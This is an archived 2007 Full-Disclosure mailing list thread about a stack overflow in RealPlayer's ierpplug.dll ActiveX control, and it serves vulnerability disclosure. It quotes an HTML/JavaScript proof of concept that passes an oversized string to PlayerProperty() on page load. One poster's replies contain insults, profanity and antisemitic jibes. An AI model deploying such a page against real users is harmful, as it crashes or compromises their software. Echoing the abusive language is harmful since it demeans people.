| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <20071127160639.7BEB2DA820@mailserver8.hushmail.com>
Date: Tue, 27 Nov 2007 11:06:38 -0500
From: "Joey Mengele" <joey.mengele@...hmail.com>
To: <joey.mengele@...hmail.com>, <full-disclosure@...ts.grok.org.uk>,
<elazarb@...thlink.net>
Subject: Re: UPDATED: RealNetworks RealPlayer ierpplug.dll
ActiveX Control Multiple Stack Overflows
LOLOLOLOL ok you win, client side denial of service warrants your 5
electronic mail messages with up to the minute updates. I bet this
one will be exploited in the wild!
Get a life LOLOL!
J
On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad
<elazarb@...thlink.net> wrote:
>"Stack Overflow" - learn to read. A DoS attack still has some
>security implications...
>
>-----Original Message-----
>>From: Joey Mengele <joey.mengele@...hmail.com>
>>Sent: Nov 27, 2007 1:05 AM
>>To: full-disclosure@...ts.grok.org.uk, elazarb@...thlink.net
>>Subject: Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer
>ierpplug.dll ActiveX Control Multiple Stack Overflows
>>
>>Holy mother of Hitler will you shut the fuck up already. This is
>a
>>"stack overflow" not a "stack based buffer overflow". There are
>no
>>security implications here. You are worse than Jewha Mati Laurio.
>
>>
>>Elazar, please do not post to this list again. Please leave the
>>trolling to the professionals.
>>
>>J
>>
>>P.S. Sorry for the swear words John.
>>
>>On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad
>><elazarb@...thlink.net> wrote:
>>>After some creative Googling, I am revising my original post. I
>>>believe that the Import() method overflow that I originally
>posted
>>>is really http://www.securityfocus.com/bid/26130, although I am
>>>not sure why Linux is listed under the "Vulnerable" section, so
>I
>>>am taking it out of the PoC code. Real claims to have patched
>this
>>>back in October, but I can still throw a stack overflow
>exception
>>>via this function using the originally stated version of
>>>RealPlayer(which I installed last night). I am now listing this
>>>vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX
>>>Control PlayerProperty() Method Stack Overflow, and it might be
>>>wise to list this under a separate BID. PoC as follows:
>>>
>>>-------------
>>><!--
>>>written by e.b.
>>>-->
>>><html>
>>> <head>
>>> <script language="JavaScript" DEFER>
>>> function Check() {
>>> var s = "AAAA";
>>>
>>> while (s.length < 999999) s=s+s;
>>>
>>> var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-
>
>>>4070-4B92-A0EA-D9994BCC0DC5}
>>>
>>> var obj2 = obj.PlayerProperty(s);
>>>
>>>
>>> }
>>> </script>
>>>
>>> </head>
>>> <body onload="JavaScript: return Check();">
>>>
>>> </body>
>>></html>
>>>-------------
>>>
>>>Elazar
>>>
>>>_______________________________________________
>>>Full-Disclosure - We believe in it.
>>>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>Hosted and sponsored by Secunia - http://secunia.com/
>>
>>--
>>Click for your daily horoscope, learn about money, love & family.
>>http://tagline.hushmail.com/fc/Ioyw6h4c4ZBHl2sHpyjNjTLgy4OTny6jhrF
>rqMryjXVt31vg2H7tNd/
>>
--
Click for your daily horoscope, learn about money, love & family.
http://tagline.hushmail.com/fc/Ioyw6h4c4ZARVCeSZnQsflA3BGgTQlm8TvOc2Qh6Kh1tD32a9sgsa8/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists